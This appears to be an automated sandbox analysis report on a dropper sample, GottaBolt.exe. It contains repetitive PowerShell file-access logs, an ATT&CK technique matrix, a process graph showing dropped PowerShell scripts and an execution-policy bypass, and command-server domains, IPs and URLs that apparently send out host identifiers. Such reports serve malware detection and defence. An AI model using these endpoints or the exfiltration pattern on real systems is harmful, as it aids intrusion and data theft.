          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\YXuuqBFUVgMBaXsghdUv.txt VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Users\user\Desktop\GottaBolt.exeKey value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation BiasJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
          Windows Management Instrumentation
          2
          Windows Service
          2
          Windows Service
          1
          Masquerading
          1
          Input Capture
          1
          System Time Discovery
          Remote Services1
          Email Collection
          11
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          PowerShell
          1
          DLL Side-Loading
          12
          Process Injection
          1
          Disable or Modify Tools
          LSASS Memory111
          Security Software Discovery
          Remote Desktop Protocol1
          Input Capture
          1
          Ingress Tool Transfer
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          DLL Side-Loading
          141
          Virtualization/Sandbox Evasion
          Security Account Manager2
          Process Discovery
          SMB/Windows Admin Shares1
          Archive Collected Data
          2
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
          Process Injection
          NTDS141
          Virtualization/Sandbox Evasion
          Distributed Component Object ModelInput Capture3
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Obfuscated Files or Information
          LSA Secrets1
          Application Window Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Timestomp
          Cached Domain Credentials1
          File and Directory Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          DLL Side-Loading
          DCSync123
          System Information Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1561030 Sample: GottaBolt.exe Startdate: 22/11/2024 Architecture: WINDOWS Score: 72 44 dfssinstitute.com 2->44 54 Suricata IDS alerts for network traffic 2->54 56 Malicious sample detected (through community Yara rule) 2->56 58 Yara detected Powershell download and execute 2->58 60 5 other signatures 2->60 9 GottaBolt.exe 23 6 2->9         started        14 mshta.exe 1 2->14         started        16 mshta.exe 2->16         started        signatures3 process4 dnsIp5 48 dfssinstitute.com 77.91.73.101, 443, 49718, 49719 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU Russian Federation 9->48 38 C:\Users\user\AppData\...\fbSDjyOv3.ps1, ASCII 9->38 dropped 40 C:\Users\user\AppData\...\fbSDjyOv2.ps1, ASCII 9->40 dropped 42 C:\Users\user\AppData\...\fbSDjyOv1.ps1, ASCII 9->42 dropped 62 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 9->62 64 Bypasses PowerShell execution policy 9->64 18 powershell.exe 37 9->18         started        21 mshta.exe 9->21         started        23 powershell.exe 14 18 14->23         started        26 powershell.exe 16->26         started        file6 signatures7 process8 dnsIp9 50 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 18->50 52 Loading BitLocker PowerShell Module 18->52 28 conhost.exe 18->28         started        30 powershell.exe 21->30         started        46 172.86.76.228, 14000, 49786 M247GB United States 23->46 32 conhost.exe 23->32         started        34 conhost.exe 26->34         started        signatures10 process11 process12 36 conhost.exe 30->36         started       

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          GottaBolt.exe5%ReversingLabsWin64.Dropper.Generic
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://dfssinstitute.com/?rs=user0%Avira URL Cloudsafe
          https://dfssinstitute.com/?yjVsmHMwodfFGINSiCsv=YXuuqBFUVgMBaXsghdUv.txt0%Avira URL Cloudsafe
          https://dfssinstitute.com/0%Avira URL Cloudsafe
          http://dfssinstitute.com0%Avira URL Cloudsafe
          http://ocsps.ssl.com0P0%Avira URL Cloudsafe
          https://dfssinstitute.com/?rs=user%7cP9ODU_2ASCSIDiskDevice%7cSCSI%7c6000c292b65879ff477a6af604113f50%Avira URL Cloudsafe
          https://dfssinstitute.com/?rs=user%7cP9ODU_2ASCSIDiskDevice%7cSCSI%7c6000c292b65879ff477a6af604113f58%7c171%7c01%3a09%7c70%Avira URL Cloudsafe
          https://dfssinstitute.com0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          dfssinstitute.com
          77.91.73.101
          truetrue
            unknown
            NameMaliciousAntivirus DetectionReputation
            https://dfssinstitute.com/?yjVsmHMwodfFGINSiCsv=YXuuqBFUVgMBaXsghdUv.txttrue
            • Avira URL Cloud: safe
            unknown
            https://dfssinstitute.com/?rs=user%7cP9ODU_2ASCSIDiskDevice%7cSCSI%7c6000c292b65879ff477a6af604113f58%7c171%7c01%3a09%7c7true
            • Avira URL Cloud: safe
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.2368919507.0000024E96770000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4067770851.000001E8ED1F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4067770851.000001E8ED333000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000004.00000002.2346622209.0000024E86928000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://dfssinstitute.com/?rs=userGottaBolt.exe, 00000000.00000002.2629516834.00000252802F1000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.2629516834.0000025280299000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.3942045111.000001E8DD3A6000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000004.00000002.2346622209.0000024E86928000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://dfssinstitute.com/GottaBolt.exefalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.3942045111.000001E8DD3A6000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://go.micropowershell.exe, 0000000C.00000002.3015755599.000001C1AA3F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.3604226839.0000025F86C88000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://ocsps.ssl.com0?GottaBolt.exefalse
                          high
                          https://contoso.com/Licensepowershell.exe, 00000008.00000002.4067770851.000001E8ED333000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0GottaBolt.exefalse
                              high
                              https://contoso.com/Iconpowershell.exe, 00000008.00000002.4067770851.000001E8ED333000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0QGottaBolt.exefalse
                                  high
                                  http://ocsps.ssl.com0GottaBolt.exefalse
                                    high
                                    http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0GottaBolt.exefalse
                                      high
                                      http://www.microsoft.powershell.exe, 00000004.00000002.2375548989.0000024E9EA7C000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0GottaBolt.exefalse
                                          high
                                          https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.3942045111.000001E8DD3A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0GottaBolt.exefalse
                                              high
                                              https://dfssinstitute.com/?rs=user%7cP9ODU_2ASCSIDiskDevice%7cSCSI%7c6000c292b65879ff477a6af604113f5GottaBolt.exe, 00000000.00000002.2629516834.0000025280350000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.2629516834.00000252803CD000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.2629516834.000002528041E000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.2629516834.00000252803F6000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.2629516834.0000025280299000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
